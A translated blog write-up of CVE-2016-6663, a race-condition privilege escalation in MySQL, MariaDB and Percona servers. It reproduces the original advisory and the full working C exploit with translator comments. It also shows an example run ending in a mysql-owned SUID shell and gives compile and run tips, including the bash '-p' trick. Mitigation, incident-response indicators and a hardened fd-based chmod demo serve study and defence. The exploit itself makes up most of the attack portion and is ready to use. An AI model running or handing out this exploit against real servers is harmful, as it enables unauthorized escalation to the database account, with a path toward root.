news/2025/10/9 4:14:01 / Source:

date: 2016/11/3
author: dlive

0x01 Translation of the original advisory

The translation is rough, so go easy on it. A few places in the original write-up are not described especially clearly, but read together with the PoC the exploitation process is easy to follow; 0x04 (summary of the exploitation process) gives a clear walk-through and is best read alongside the PoC.

# http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

- Release date: 01.11.2016
- Discovered by: Dawid Golunski
- Severity: Critical
- CVE-2016-6663 / OCVE-2016-5616
- http://legalhackers.com

I. VULNERABILITY
-------------------------
MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition

MariaDB
< 5.5.52
< 10.1.18
< 10.0.28

MySQL
<= 5.5.51
<= 5.6.32
<= 5.7.14

Percona Server
< 5.5.51-38.2
< 5.6.32-78-1
< 5.7.14-8

Percona XtraDB Cluster
< 5.6.32-25.17
< 5.7.14-26.17
< 5.5.41-37.0

III. INTRODUCTION
-------------------------
An independent research has revealed a race condition vulnerability which is present in MySQL, MariaDB and PerconaDB databases.

The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql').

[Translator's note: for example, a local system user test_user who holds a low-privileged database account test_db_user with CREATE/INSERT/SELECT on one database can use this bug to go from test_user to the database system user, normally mysql.]

Successful exploitation would allow an attacker to gain access to all of the databases stored on the affected database server.

The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server.

IV.
DESCRIPTION
-------------------------

Table locations
~~~~~~~~~~~~~~~~~~

MySQL-based databases allow users with CREATE table privilege to optionally specify a disk path of the directory where the table will be stored via a DATA DIRECTORY parameter in the CREATE statement.

Users who have access to a database account with CREATE grant could create a table under a directory that they can control. For example:

attacker@debian:~$ mkdir /tmp/disktable
attacker@debian:~$ chmod 777 /tmp/disktable/
attacker@debian:~$ ls -ld /tmp/disktable/
drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/

A user could then place a table within the directory with the following SQL statement:

mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';

which would result in creating the following table file:

attacker@debian:~$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD

Race Condition
~~~~~~~~~~~~~~~~~~

Observing file operations performed on the table stored within the directory, it was discovered that REPAIR TABLE SQL statement which is available to low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe operations on temporary files created during the table repair process.

Executing the statement:

mysql> REPAIR TABLE poctab1;
+----------------+--------+----------+----------+
| Table          | Op     | Msg_type | Msg_text |
+----------------+--------+----------+----------+
| testdb.poctab1 | repair | status   | OK       |
+----------------+--------+----------+----------+

would result in execution of the following system calls:

[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid  1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65
[pid  1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory)
[pid  1463] lseek(65, 0, SEEK_CUR) = 0
[pid  1463] lseek(65, 0, SEEK_END) = 0
[pid  1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0
[pid  1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66
[pid  1463] lseek(65, 0, SEEK_END) = 0
[pid  1463] lseek(64, 0, SEEK_END) = 1024
[pid  1463] close(65) = 0
[pid  1463] close(66) = 0
[pid  1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0
[pid  1463] lstat("/tmp/disktable", {st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0
[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid  1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0
[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0
[pid  1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0
[pid  1463] unlink("/tmp/disktable/poctab1.MYD") = 0
[pid  1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0

The first call:

[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0

was found to check file permissions of poctab1.MYD table which are then copied with chmod() to the newly created poctab1.TMD temporary file containing the repaired table.

The code is vulnerable to Race Condition between the call:

[pid  1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0

and

[pid  1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0

If an attacker managed to unlink the temporary table poctab1.TMD and replace it with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), they would be able to apply arbitrary permissions on the data directory. The attacker would be able to control the set of permissions by pre-setting them on poctab1.MYD file before executing the REPAIR TABLE statement. For example, by setting the permissions of poctab1.MYD to 777 the data directory would become readable and writable to the attacker.

[Translator's note: chmod() follows symlinks, so the permissions read from the attacker's poctab1.MYD land on whatever poctab1.TMD points at by the time chmod() runs; that is the whole bug.]

Obtaining mysql-suid shell
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Apart from gaining access to arbitrary mysql files, the attacker could also achieve arbitrary code execution in the context of mysql user (mysql shell).

This could be done by first pre-setting permissions on poctab1.MYD to 04777 (suid), and winning the race so that the permissions get applied on a copy of a bash shell file through the vulnerable chmod() call effectively creating a shell that elevates their permissions after execution.

There is only one problem. Their suid shell would remain to be owned by the attackers user id and not mysql user.

To elevate their privileges, attacker would need to copy the bash shell to a mysql-owned table file which are owned by mysql user. However mysql table files are not writable by other users making it impossible for attacker to save the shell.

This could be bypassed if attacker created a specially crafted directory with a group sticky bit and then created a second table named poctab2 as follows:

attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/
attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/
drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/

mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable';
Query OK, 0 rows affected (0.00 sec)

attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/
total 0
-rw-rw---- 1 mysql mysql    0 Oct 28 11:04 poctab1.MYD
-rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD

As we can see poctab2.MYD table (thanks to the sticky bit (s) on the permissions of the group on disktable directory) has mysql as the owner but attacker as the group.

[Translator's note: the 's' in the group triad is the setgid bit (chmod g+s), which makes files created in the directory inherit its group; see 0x05.]

Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file and preserve the file owner.

Finally, they could exploit the Race Condition again and have SUID+exec permissions applied on poctab2.MYD which would then allow them to execute the suid shell with elevated privileges of the mysql user.

From mysql to root
~~~~~~~~~~~~~~~~~~~~~~~~

After obtaining a mysql suid shell, attackers could then exploit one of the other MySQL vulnerabilities discovered by the author of this advisory:

CVE-2016-6662
or
CVE-2016-6664 (OCVE-2016-5617)

to escalate their privileges from mysql user to root system user.

V.
PROOF OF CONCEPT EXPLOIT
-------------------------

------------------[ mysql-privesc-race.c ]--------------------

(see 0x03, analysis of the exploit code)

------------------[ EOF ]--------------------

Example run:
~~~~~~~~~~~~~~

attacker@xenial:~/mysql-exploit$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 16.04.1 LTS
Release:	16.04
Codename:	xenial

attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv
ii  mariadb-server            10.0.27-0ubuntu0.16.04.1  all    MariaDB database server (metapackage depending on the latest version)
ii  mariadb-server-10.0       10.0.27-0ubuntu0.16.04.1  amd64  MariaDB database server binaries
ii  mariadb-server-core-10.0  10.0.27-0ubuntu0.16.04.1  amd64  MariaDB database core server files

attacker@xenial:~/mysql-exploit$ id
uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)

attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;'
+-----------------------------------------------------------------------------------------------------------------+
| Grants for attacker@localhost                                                                                   |
+-----------------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' |
| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost'                                       |
+-----------------------------------------------------------------------------------------------------------------+

attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.*
ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied

attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb

MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)

CVE-2016-6663 / OCVE-2016-5616

For testing purposes only. Do no harm.

Discovered/Coded by:

Dawid Golunski
http://legalhackers.com

[+] Starting the exploit as:
uid=1001(attacker) gid=1001(attacker) groups=1001(attacker)

[+] Connecting to the database `pocdb` as attacker@localhost

[+] Creating exploit temp directory /tmp/mysql_privesc_exploit

[+] Creating mysql tables

DROP TABLE IF EXISTS exploit_table
DROP TABLE IF EXISTS mysql_suid_shell
CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'
CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit'

[+] Copying bash into the mysql_suid_shell table.
    After the exploitation the following file/table will be assigned SUID and executable bits :
-rw-rw---- 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Entering the race loop... Hang in there...

[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell:

-rwsrwxrwx 1 mysql attacker 1037528 Nov  1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD

[+] Spawning the mysql SUID shell now...
    Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :)

mysql_suid_shell.MYD-4.3$ whoami
mysql
mysql_suid_shell.MYD-4.3$ id
uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker)
mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.*
-rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm
-rw-rw---- 1 mysql mysql  168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD
-rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI
mysql_suid_shell.MYD-4.3$ exit
exit

[+] Job done. Exiting

real	0m28.999s
user	0m0.016s
sys	0m0.016s

VI. BUSINESS IMPACT
-------------------------

Malicious local users with DB access granted a common set of privileges (SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary code and escalate their privileges to mysql system user.
This would allow them to gain access to all of the databases stored on the server as well as exploit CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges to root system user (rootshell) and fully compromise the target server.

This vulnerability could for example be exploited by malicious users in a shared hosting environment where each user is supposed to have access to only one database assigned to them.

It could also be exploited by attackers who have managed to find a vulnerability in a website and gained access to the target system as a low-privileged user (such as apache/www-data).

VIII. SOLUTION
-------------------------

Update to security releases issued by the vendor.

As a temporary mitigation, you can disable symbolic link support in the database server configuration with the following my.cnf config setting:

symbolic-links = 0

Nevertheless, an update to a patched release is recommended.

[Translator's note: the mitigation works because a server without symlink support ignores the DATA DIRECTORY option, which the exploit needs to place the table file in a directory the attacker controls. Check the running value with SHOW VARIABLES LIKE 'have_symlink' (it should read DISABLED) rather than trusting the config file.]

0x02 Reproducing the vulnerability

System: Debian 4.0.4-1 kali2 x86_64
MySQL version: 5.5.47
Low-privileged system user: attacker (newly created, unprivileged)
Database: test_6663, user: test_6663, password: 6663, database privileges: create/insert/select/drop

Compiling the exploit: if compilation fails it is probably because the MySQL client library is missing; install it with sudo apt-get install libmysqld-dev.

# if the mysqlclient shared library lives elsewhere, add -L, e.g. -L/usr/lib64/mysql
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient

Running the exploit: as the screenshot shows, the user after escalation is mysql and MySQL's data files can be read; the root account's password is empty and the hashed MySQL password of test_6663 is readable.

After a successful attack you do not need to run the race again to get another shell as the mysql system user: just run the mysql_suid_shell.MYD file. There is a pitfall here, though: running the file directly does not give you mysql's privileges. You have to pass -p, i.e. ./mysql_suid_shell.MYD -p -i (see 0x05, privilege escalation tips, 3. using SUID, for the reason).

0x03 Analysis of the exploit code

Some places in the author's write-up are not described especially clearly, but combined with the PoC the exploitation process is easy to follow. The exploit source, with the translator's comments added in English:

```c
/*
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)

CVE-2016-6663 / OCVE-2016-5616

Discovered/Coded by:

Dawid Golunski
dawid[at]legalhackers.com

@dawid_golunski
http://legalhackers.com

Compile:

gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient

Note:
* On RedHat-based systems you might need to change /tmp to another public directory
  (translator: e.g. /uploads)
* For testing purposes only. Do no harm.

Full advisory URL:
http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html

*/

#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/inotify.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <mysql.h>
#include <time.h>
#include <sys/prctl.h>

#define EXP_PATH          "/tmp/mysql_privesc_exploit"
#define EXP_DIRN          "mysql_privesc_exploit"
#define MYSQL_TAB_FILE    EXP_PATH "/exploit_table.MYD"
#define MYSQL_TEMP_FILE   EXP_PATH "/exploit_table.TMD"
#define SUID_SHELL        EXP_PATH "/mysql_suid_shell.MYD"
#define MAX_DELAY         1000   // can be used in the race to adjust the timing if necessary

MYSQL *conn;            // DB handles
MYSQL_RES *res;
MYSQL_ROW row;
unsigned long cnt;

void intro() {
    printf(
    "\033[94m\nMySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\nmysql-privesc-race.c (ver. 1.0)\n\n"
    "CVE-2016-6663 / OCVE-2016-5616\n\n"
    "For testing purposes only. Do no harm.\n\n"
    "Discovered/Coded by:\n\n"
    "Dawid Golunski \n"
    "http://legalhackers.com"
    "\033[0m\n\n");
}

void usage(char *argv0) {
    intro();
    printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
}

// run one SQL statement on the shared connection; exit on error
void mysql_cmd(char *sql_cmd, int silent) {
    if (!silent) {
        printf("%s \n", sql_cmd);
    }
    if (mysql_query(conn, sql_cmd)) {
        fprintf(stderr, "%s\n", mysql_error(conn));
        exit(1);
    }
    res = mysql_store_result(conn);
    if (res) mysql_free_result(res);
}

int main(int argc, char **argv)
{
    int randomnum = 0;
    int io_notified = 0;
    int myd_handle;
    int is_shell_suid = 0;
    pid_t pid;
    int status;
    struct stat st;

    /* io notify */
    int fd;
    int ret;
    char buf[4096] __attribute__((aligned(8)));
    struct inotify_event *event;

    /* credentials */
    char *user     = argv[1];
    char *password = argv[2];
    char *db_host  = argv[3];
    char *database = argv[4];

    // Disable buffering of stdout
    setvbuf(stdout, NULL, _IONBF, 0);

    // Get the params
    if (argc != 5) {
        usage(argv[0]);
        exit(1);
    }

    intro();

    // Show initial privileges
    printf("\n[+] Starting the exploit as: \n");
    system("id");

    // Connect to the database server with provided credentials
    printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
    conn = mysql_init(NULL);
    if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
        fprintf(stderr, "%s\n", mysql_error(conn));
        exit(1);
    }

    // Prepare tmp dir
    // translator: create /tmp/mysql_privesc_exploit and set the SGID bit on it,
    // so table files mysql creates inside it get the attacker's group
    printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
    umask(000);
    system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
    system("chmod g+s /tmp/" EXP_DIRN);

    // Prepare exploit tables :)
    // translator: two tables, exploit_table (raced) and mysql_suid_shell (the target)
    printf("\n[+] Creating mysql tables \n\n");
    mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
    mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
    mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
    mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);

    // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
    // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
    // translator: cp overwrites the contents (group attacker has write access) but the owner stays mysql
    printf("\n[+] Copying bash into the mysql_suid_shell table.\n    After the exploitation the following file/table will be assigned SUID and executable bits : \n");
    system("cp /bin/bash " SUID_SHELL);
    system("ls -l " SUID_SHELL);

    // Use inotify to get the timing right
    fd = inotify_init();
    if (fd < 0) {
        printf("failed to inotify_init\n");
        return -1;
    }
    ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);

    /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
    printf("\n[+] Entering the race loop... Hang in there...\n");
    // translator: keep trying until mysql_suid_shell.MYD carries the SUID bit
    while (is_shell_suid != 1) {
        cnt++;
        if ((cnt % 100) == 0) {
            printf("->");
            //fflush(stdout);
        }

        /* Create empty file , remove if already exists */
        // translator: remove exploit_table.TMD and exploit_table.MYD from the previous attempt
        unlink(MYSQL_TEMP_FILE);
        unlink(MYSQL_TAB_FILE);
        mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
        mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);

        /* random num if needed */
        srand(time(NULL));
        randomnum = (rand() % MAX_DELAY);

        // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
        pid = fork();
        if (pid < 0) {
            fprintf(stderr, "Fork failed :(\n");
        }

        /* Child process - executes REPAIR TABLE SQL statement */
        // translator: the repair creates the .TMD file the parent is waiting for
        if (pid == 0) {
            usleep(500);
            unlink(MYSQL_TEMP_FILE);
            mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
            // child stops here
            exit(0);
        }

        /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
        if (pid > 0) {
            io_notified = 0;
            while (1) {
                int processed = 0;
                ret = read(fd, buf, sizeof(buf));
                if (ret < 0) {
                    break;
                }
                while (processed < ret) {
                    event = (struct inotify_event *)(buf + processed);
                    if (event->mask & IN_CLOSE) {
                        if (!strcmp(event->name, "exploit_table.TMD")) {
                            //usleep(randomnum);
                            // Set the .MYD permissions to suid+exec before they get copied to the .TMD file
                            // translator: delete the exploit_table.MYD mysql created, recreate it as
                            // attacker and give it 04777; that mode is what REPAIR will copy onto .TMD
                            unlink(MYSQL_TAB_FILE);
                            myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
                            close(myd_handle);
                            chmod(MYSQL_TAB_FILE, 04777);

                            // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
                            // translator: exploit_table.TMD now points at mysql_suid_shell.MYD
                            unlink(MYSQL_TEMP_FILE);
                            symlink(SUID_SHELL, MYSQL_TEMP_FILE);
                            io_notified = 1;
                        }
                    }
                    // translator: advance past the name bytes as well (the original advanced by
                    // sizeof(struct inotify_event) only, which misreads any further event in buf)
                    processed += sizeof(struct inotify_event) + event->len;
                }
                if (io_notified) {
                    break;
                }
            }
            waitpid(pid, &status, 0);
        }

        // Check if SUID bit was set at the end of this attempt
        if (lstat(SUID_SHELL, &st) == 0) {
            if (st.st_mode & S_ISUID) {
                is_shell_suid = 1;
            }
        }
    }

    printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
    system("ls -l " SUID_SHELL);

    printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n    Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
    // translator: start the copied bash; with SUID set and -p given it keeps mysql's euid
    system(SUID_SHELL " -p -i ");
    //system(SUID_SHELL " -p -c '/bin/bash -i -p'");

    /* close MySQL connection and exit */
    printf("\n[+] Job done. Exiting\n\n");
    mysql_close(conn);
    return 0;
}
```

0x04 Summary of the exploitation process

Two important mechanisms:

1. MySQL creating a table at a specified path (not strictly part of the bug, but worth mentioning XD). When CREATE TABLE specifies a DATA DIRECTORY, MySQL stores the table's MYD file at that path and creates a symbolic link to it under /var/lib/mysql/database_name/.

2. MySQL's REPAIR process (traced with strace -p pid_of_mysql -f -o output_file). During the repair the original MYD file is deleted and the TMD file is renamed to become the new MYD. The vulnerability lies between lstat and chmod (see the advisory in 0x01 and the race condition model in 0x05).

Classifying by which table is operated on, the exploitation splits into two parts:

Operations on the mysql_suid_shell table: create mysql_suid_shell with its MYD file stored in the SGID directory /tmp/mysql_privesc_exploit, so that mysql_suid_shell.MYD has owner mysql and group attacker (see 0x05). attacker can therefore copy /bin/bash over /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD while the file's owner remains mysql.

Operations on the exploit_table table: create exploit_table with its MYD file stored in /tmp/mysql_privesc_exploit; delete the MYD created by mysql and recreate it as attacker; then REPAIR exploit_table. During the repair a TMD file is generated; by winning the race, replace the TMD with a symlink to mysql_suid_shell.MYD. Because the TMD receives the same permissions as the MYD, and the MYD's permissions are controlled by attacker, mysql_suid_shell.MYD ends up with mode 04777 (set-uid + exec). Then run mysql_suid_shell.MYD.

State of /tmp/mysql_privesc_exploit after a successful attack:

root@dlive:/tmp/mysql_privesc_exploit# ls -la
total 1016
drwxrwsrwx  2 attacker attacker    4096 Nov  9 19:15 .
drwxrwxrwt 18 root     root        4096 Nov  9 19:12 ..
-rwsrwxrwx  1 attacker attacker       0 Nov  9 19:15 exploit_table.MYD
lrwxrwxrwx  1 attacker attacker      47 Nov  9 19:15 exploit_table.TMD -> /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD
-rwsrwxrwx  1 mysql    attacker 1029624 Nov  9 19:12 mysql_suid_shell.MYD

0x05 Abstracting the vulnerability and exploit model

From the root cause we can abstract a simplified model; abstracting models helps with understanding and with building up a body of knowledge. CVE-2016-6663 can be abstracted into two models (both fairly simple):

1. Race condition model

The code first calls lstat() on the MYD file to read its permissions, then calls chmod() on the TMD file to apply them. If, after the lstat(), the TMD file is swapped for a symlink to an attacker-controlled file, the attacker escalates privileges. Both calls operate on path names, which is exactly what makes the swap possible. For a detailed race condition demo see the SEED Labs exercise on the subject.

2. Privilege escalation tips

Using symbolic links: ln -s file1 file2 creates a symlink file2 pointing at file1. chmod on a symlink changes the permissions of the target file. Symlinks can sometimes also be used to bypass directory access restrictions.

Using SGID: if SGID is set on a directory, then any user who has write permission on it (can create files) will see the files they create get the directory's group rather than their own.

Using SUID: mysql_suid_shell.MYD with SUID set runs with the privileges of its owner. The pitfall is that bash has protection against running setuid: mysql_suid_shell.MYD has to be run with the -p option for the SUID to actually take effect (see http://unix.stackexchange.com/questions/116792/privileged-mode-in-bash).

# bash man page
-p      Turn on privileged mode.
In this mode, the $BASH_ENV and $ENV files are not processed, shell functions are not inherited from the environment, and the SHELLOPTS, BASHOPTS, CDPATH and GLOBIGNORE variables, if they appear in the environment, are ignored. If the shell is started with the effective user (group) id not equal to the real user (group) id, and the -p option is not supplied, these actions are taken and the effective user id is set to the real user id. If the -p option is supplied at startup, the effective user id is not reset. Turning this option off causes the effective user and group ids to be set to the real user and group ids.

0x06 Incident response

The temporary workaround for this vulnerability is to disable symbolic links in my.cnf:

symbolic-links = 0

Attack detection: the exploit published by the author of CVE-2016-6663 does not, by default, remove its tables and table files after a successful escalation, so a few simple checks tell you whether a server was hit with this exploit as shipped:

- mysql --version, to confirm whether the installed version is in the affected range
- whether the directory /tmp/mysql_privesc_exploit exists, and whether it contains files such as exploit_table.MYD, exploit_table.TMD and mysql_suid_shell.MYD
- whether some database directory under /var/lib/mysql/ contains symlinks named exploit_table.MYD or mysql_suid_shell.MYD
- whether tables named exploit_table or mysql_suid_shell exist in the database

Bear in mind that every one of these names is a #define in the exploit source and trivially changed; the indicators that survive renaming are a table symlink under the datadir pointing into a directory the attacker controls (such as /tmp), a table file carrying setuid or exec bits, and a setuid binary owned by mysql anywhere on the host.
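The race condition model in 0x05 comes down to a permission copy done by path name. The following added example (mine, not from the advisory or from the PoC; the scratch directory under /tmp and the file names tab.MYD, tab.TMD and shell are assumptions for the demo) puts the lstat()/chmod() pattern from the strace next to a descriptor-based version, then reproduces the symlink swap against both. The fd-based version is the generic hardening for this class of bug; it is not a claim about what the vendors' patches changed.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, as in the REPAIR TABLE trace: read the mode of the old
 * table file by path, then apply it to the new temp file by path. chmod()
 * follows symlinks, so if `tmd` was swapped for a symlink between the two
 * calls, the mode lands on the link target instead. */
int copy_mode_by_path(const char *myd, const char *tmd)
{
    struct stat st;
    if (lstat(myd, &st) != 0)
        return -1;
    /* <-- race window: anyone who can write the directory swaps `tmd` here */
    return chmod(tmd, st.st_mode & 07777);
}

/* Hardened pattern: open the file we created with O_NOFOLLOW (a symlink makes
 * open() fail with ELOOP), confirm via fstat() that it is a regular file, and
 * apply the mode with fchmod() through the descriptor, so nothing done to the
 * path afterwards can redirect the chmod. Setuid/setgid/sticky bits are never
 * copied from a file whose mode the user controls. */
int copy_mode_by_fd(const char *myd, const char *tmd)
{
    struct stat src, dst;
    if (lstat(myd, &src) != 0)
        return -1;
    int fd = open(tmd, O_RDWR | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;                      /* errno == ELOOP when tmd is a symlink */
    if (fstat(fd, &dst) != 0 || !S_ISREG(dst.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    int rc = fchmod(fd, src.st_mode & 0777);
    close(fd);
    return rc;
}

/* Demo scaffolding (assumed layout): tab.MYD carries the attacker-chosen 04777,
 * tab.TMD is either a symlink to `shell` (the attack) or a plain file (a normal repair). */
struct layout { char dir[64], myd[96], tmd[96], shell[96]; };

static int make_file(const char *path, mode_t mode)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    close(fd);
    return chmod(path, mode);           /* explicit chmod, so umask cannot interfere */
}

static int setup(struct layout *l, int tmd_is_symlink)
{
    strcpy(l->dir, "/tmp/toctou_demo_XXXXXX");
    if (!mkdtemp(l->dir)) return -1;
    snprintf(l->myd, sizeof l->myd, "%s/tab.MYD", l->dir);
    snprintf(l->tmd, sizeof l->tmd, "%s/tab.TMD", l->dir);
    snprintf(l->shell, sizeof l->shell, "%s/shell", l->dir);
    if (make_file(l->myd, 04777) || make_file(l->shell, 0644)) return -1;
    return tmd_is_symlink ? symlink(l->shell, l->tmd) : make_file(l->tmd, 0600);
}

static int is_setuid(const char *path)
{
    struct stat st;
    return lstat(path, &st) == 0 && (st.st_mode & S_ISUID) != 0;
}

static void teardown(struct layout *l)
{
    unlink(l->myd); unlink(l->tmd); unlink(l->shell); rmdir(l->dir);
}

/* 1 if the path-based copy pushed the SUID bit through the symlink onto `shell` */
int demo_vulnerable(void)
{
    struct layout l;
    if (setup(&l, 1) != 0) return -1;
    copy_mode_by_path(l.myd, l.tmd);
    int won = is_setuid(l.shell);
    teardown(&l);
    return won;
}

/* 1 if the fd-based copy refused the symlink with ELOOP and `shell` stayed 0644 */
int demo_hardened_symlink(void)
{
    struct layout l;
    if (setup(&l, 1) != 0) return -1;
    int rc = copy_mode_by_fd(l.myd, l.tmd);
    int err = errno;
    int ok = rc == -1 && err == ELOOP && !is_setuid(l.shell);
    teardown(&l);
    return ok;
}

/* 1 if, on a real temp file, the fd-based copy still applies the mode, minus the special bits */
int demo_hardened_regular(void)
{
    struct layout l;
    struct stat st;
    if (setup(&l, 0) != 0) return -1;
    int rc = copy_mode_by_fd(l.myd, l.tmd);
    int ok = rc == 0 && lstat(l.tmd, &st) == 0 && (st.st_mode & 07777) == 0777;
    teardown(&l);
    return ok;
}

int main(void)
{
    printf("path-based chmod, symlinked .TMD: shell became setuid? %d\n", demo_vulnerable());
    printf("fd-based chmod,   symlinked .TMD: refused, shell untouched? %d\n", demo_hardened_symlink());
    printf("fd-based chmod,   regular .TMD:   applied as 0777, no setuid? %d\n", demo_hardened_regular());
    return 0;
}
```

The demo does the swap before the chmod instead of racing it, because the point is the primitive, not the timing: once a privileged process applies a mode to a name, winning the race is only a matter of retries, as the 5-try run in the advisory shows. Note that the hardened version is still only correct if the server also stops reading the mode from a file the attacker owns; here the special bits are masked out, which is the part of the fix that survives even if the open() check were missing.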

